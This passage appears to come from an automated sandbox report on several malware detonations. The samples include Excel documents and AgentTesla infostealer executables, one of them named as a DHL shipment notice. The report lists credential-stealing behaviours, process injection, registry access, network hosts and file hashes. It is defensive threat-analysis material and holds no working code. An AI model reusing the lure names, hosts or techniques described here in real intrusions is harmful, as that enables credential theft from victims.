| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
Files
memory/1940-0-0x00000000001B0000-0x00000000001B1000-memory.dmp
memory/1940-2-0x0000000000406000-0x0000000000407000-memory.dmp
memory/1940-3-0x0000000000400000-0x00000000004AD000-memory.dmp
memory/1940-4-0x00000000001B0000-0x00000000001B1000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
133s
Max time network
148s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\680589798891.xls"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| FR | 52.109.68.129:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.68.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.77.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
Files
memory/1740-1-0x00007FFD2908D000-0x00007FFD2908E000-memory.dmp
memory/1740-0-0x00007FFCE9070000-0x00007FFCE9080000-memory.dmp
memory/1740-3-0x00007FFCE9070000-0x00007FFCE9080000-memory.dmp
memory/1740-2-0x00007FFCE9070000-0x00007FFCE9080000-memory.dmp
memory/1740-4-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp
memory/1740-5-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp
memory/1740-6-0x00007FFCE9070000-0x00007FFCE9080000-memory.dmp
memory/1740-7-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp
memory/1740-8-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp
memory/1740-10-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp
memory/1740-12-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp
memory/1740-13-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp
memory/1740-14-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp
memory/1740-16-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp
memory/1740-17-0x00007FFCE6E20000-0x00007FFCE6E30000-memory.dmp
memory/1740-15-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp
memory/1740-18-0x00007FFCE6E20000-0x00007FFCE6E30000-memory.dmp
memory/1740-11-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp
memory/1740-9-0x00007FFCE9070000-0x00007FFCE9080000-memory.dmp
memory/1740-46-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp
memory/1740-47-0x00007FFD2908D000-0x00007FFD2908E000-memory.dmp
memory/1740-48-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | d6a8751247b907a05fe4c5e591a7329e |
| SHA1 | e04fa6f11939152ac76fc1f5e593ce5dae258319 |
| SHA256 | 1b3914a8e1640456acd4463618ecec0fa7ae9ddeae317220fa766be5f2974082 |
| SHA512 | 9ba04fa5148d0bcde255d723a2b9c0533b0c2bd996fe8d5221dfed146f90fac0e895395689530a935f31878b0f70b825cd0fab1ce0211aaeeaaae23844ecf51c |
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
127s
Max time network
152s
Command Line
Signatures
AgentTesla
Agenttesla family
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4992 set thread context of 4440 | N/A | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\EZ0496.exe
"C:\Users\Admin\AppData\Local\Temp\EZ0496.exe"
C:\Users\Admin\AppData\Local\Temp\EZ0496.exe
"C:\Users\Admin\AppData\Local\Temp\EZ0496.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.77.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.77.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
memory/4992-0-0x000000007440E000-0x000000007440F000-memory.dmp
memory/4992-1-0x00000000008C0000-0x000000000098A000-memory.dmp
memory/4992-2-0x0000000074400000-0x0000000074BB0000-memory.dmp
memory/4992-3-0x00000000052C0000-0x00000000052CE000-memory.dmp
memory/4992-4-0x0000000005590000-0x0000000005622000-memory.dmp
memory/4992-5-0x000000007440E000-0x000000007440F000-memory.dmp
memory/4992-6-0x0000000074400000-0x0000000074BB0000-memory.dmp
memory/4992-7-0x0000000005830000-0x00000000058CC000-memory.dmp
memory/4992-8-0x0000000005CC0000-0x0000000005D7C000-memory.dmp
memory/4992-9-0x0000000005A10000-0x0000000005A4C000-memory.dmp
memory/4440-10-0x0000000000400000-0x000000000043C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EZ0496.exe.log
| MD5 | e50d61d6d5cec0d2c6b3fbf02b17af2d |
| SHA1 | fcf43f96e7389c27ee201fb00b65db01ca2cee40 |
| SHA256 | a87cf2dbf70a59d3d347f9ca743b6ceb3c805b4714cf4fb963c18b9ca8ffd0a9 |
| SHA512 | 0348b60095cd48d275a5234fe34c1fd7a7c9921e1d92dafea0379d607f898eb1c2e089dafa1db608fad65497fc8f90fa699109b06a5f2c12c0bc8c9192ff9924 |
memory/4992-13-0x0000000074400000-0x0000000074BB0000-memory.dmp
memory/4440-14-0x0000000074400000-0x0000000074BB0000-memory.dmp
memory/4440-15-0x00000000052D0000-0x0000000005874000-memory.dmp
memory/4440-16-0x0000000074400000-0x0000000074BB0000-memory.dmp
memory/4440-17-0x0000000005030000-0x0000000005048000-memory.dmp
memory/4440-18-0x0000000005CC0000-0x0000000005D26000-memory.dmp
memory/4440-19-0x0000000074400000-0x0000000074BB0000-memory.dmp
memory/4440-20-0x0000000074400000-0x0000000074BB0000-memory.dmp
memory/4440-21-0x0000000005EB0000-0x0000000005F00000-memory.dmp
memory/4440-22-0x0000000006060000-0x000000000606A000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20241010-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\680589798891.xls
Network
Files
memory/1500-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/1500-1-0x0000000072A8D000-0x0000000072A98000-memory.dmp
memory/1500-2-0x0000000000300000-0x0000000000400000-memory.dmp
memory/1500-3-0x0000000000300000-0x0000000000400000-memory.dmp
memory/1500-4-0x0000000000300000-0x0000000000400000-memory.dmp
memory/1500-17-0x0000000000300000-0x0000000000400000-memory.dmp
memory/1500-16-0x0000000000300000-0x0000000000400000-memory.dmp
memory/1500-15-0x0000000000300000-0x0000000000400000-memory.dmp
memory/1500-14-0x0000000000300000-0x0000000000400000-memory.dmp
memory/1500-13-0x0000000000300000-0x0000000000400000-memory.dmp
memory/1500-12-0x0000000000300000-0x0000000000400000-memory.dmp
memory/1500-11-0x0000000000300000-0x0000000000400000-memory.dmp
memory/1500-10-0x0000000000300000-0x0000000000400000-memory.dmp
memory/1500-9-0x0000000000300000-0x0000000000400000-memory.dmp
memory/1500-8-0x0000000000300000-0x0000000000400000-memory.dmp
memory/1500-7-0x0000000000300000-0x0000000000400000-memory.dmp
memory/1500-6-0x0000000000300000-0x0000000000400000-memory.dmp
memory/1500-5-0x0000000000300000-0x0000000000400000-memory.dmp
memory/1500-18-0x0000000072A8D000-0x0000000072A98000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20240903-en
Max time kernel
117s
Max time network
122s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\Math.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\Math.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 220
Network
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
154s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\I795405_33242211.xls"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| FR | 52.109.68.129:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.68.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.173.79.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.194.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
memory/4328-0-0x00007FFB25A2D000-0x00007FFB25A2E000-memory.dmp
memory/4328-3-0x00007FFAE5A10000-0x00007FFAE5A20000-memory.dmp
memory/4328-4-0x00007FFAE5A10000-0x00007FFAE5A20000-memory.dmp
memory/4328-6-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp
memory/4328-5-0x00007FFAE5A10000-0x00007FFAE5A20000-memory.dmp
memory/4328-10-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp
memory/4328-11-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp
memory/4328-17-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp
memory/4328-16-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp
memory/4328-18-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp
memory/4328-15-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp
memory/4328-14-0x00007FFAE39B0000-0x00007FFAE39C0000-memory.dmp
memory/4328-13-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp
memory/4328-20-0x00007FFAE39B0000-0x00007FFAE39C0000-memory.dmp
memory/4328-19-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp
memory/4328-12-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp
memory/4328-9-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp
memory/4328-22-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp
memory/4328-23-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp
memory/4328-21-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp
memory/4328-8-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp
memory/4328-7-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp
memory/4328-2-0x00007FFAE5A10000-0x00007FFAE5A20000-memory.dmp
memory/4328-1-0x00007FFAE5A10000-0x00007FFAE5A20000-memory.dmp
memory/4328-47-0x00007FFB25A2D000-0x00007FFB25A2E000-memory.dmp
memory/4328-48-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp
memory/4328-49-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | de643de789f31affa9257ebec8e9965e |
| SHA1 | 342b94a4511f76030be21621bbc0bf1129002eda |
| SHA256 | 02d7a3debe26df33a03ab55c4a9fa49befd762a4cd60780ba9717a1b670b97f7 |
| SHA512 | 8b3ec35f1e261c7b36ccdd24220f0acb14072536b91d9a65ec002bf44018ed6cc7f51ea6c0caad27172ea44b6036a865baa62743ce82dd4bc8ea8531574984c8 |
Analysis: behavioral22
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
150s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\systeminfo.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\systeminfo.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\systeminfo.exe
"C:\Users\Admin\AppData\Local\Temp\systeminfo.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral23
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
95s
Max time network
130s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\wecutil.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\wecutil.exe
"C:\Users\Admin\AppData\Local\Temp\wecutil.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
139s
Max time network
141s
Command Line
Signatures
AgentTesla
Agenttesla family
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3056 set thread context of 3448 | N/A | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
